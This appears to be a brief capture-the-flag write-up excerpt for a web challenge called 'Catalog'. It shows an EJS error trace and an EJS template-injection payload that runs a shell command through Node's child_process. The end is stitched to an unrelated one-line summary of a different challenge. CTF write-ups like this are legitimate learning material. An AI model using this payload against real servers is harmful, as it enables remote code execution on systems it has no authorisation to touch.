# Catalog (easy) - Web Exploitation  
`author : ardhani`

```node  
Error: /app/views/cat.ejs:21  
19| </div>  
20| <div>  
>> 21| <%- include('descriptions/' + description) %>  
22| </div>  
23| </div>  
24| </main>

Could not find the include file "descriptions/asd"  
at getIncludePath (/app/node_modules/ejs/lib/ejs.js:185:13)  
at includeFile (/app/node_modules/ejs/lib/ejs.js:311:19)  
at include (/app/node_modules/ejs/lib/ejs.js:701:16)  
at eval ("/app/views/cat.ejs":24:17)  
at cat (/app/node_modules/ejs/lib/ejs.js:703:17)  
at tryHandleCache (/app/node_modules/ejs/lib/ejs.js:274:36)  
at exports.renderFile [as engine] (/app/node_modules/ejs/lib/ejs.js:491:10)  
at View.render (/app/node_modules/express/lib/view.js:135:8)  
at tryRender (/app/node_modules/express/lib/application.js:657:10)  
at Function.render (/app/node_modules/express/lib/application.js:609:3)  
```

so we can input this payload `<%=
function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('COMMAND_HERE')}()
%>`

Original writeup (https://github.com/naufalardhani/ctf-
journey/tree/main/Writeups/ctftime/m*ctf2023/web_catalog).Author writeup. In short: two injections + meta-redirect + CSRF + weird user
activation behavior with extension postMessage + scroll to text fragment +
lazy-loading image.

Original writeup (https://dttw.tech/posts/B19RXWzYL).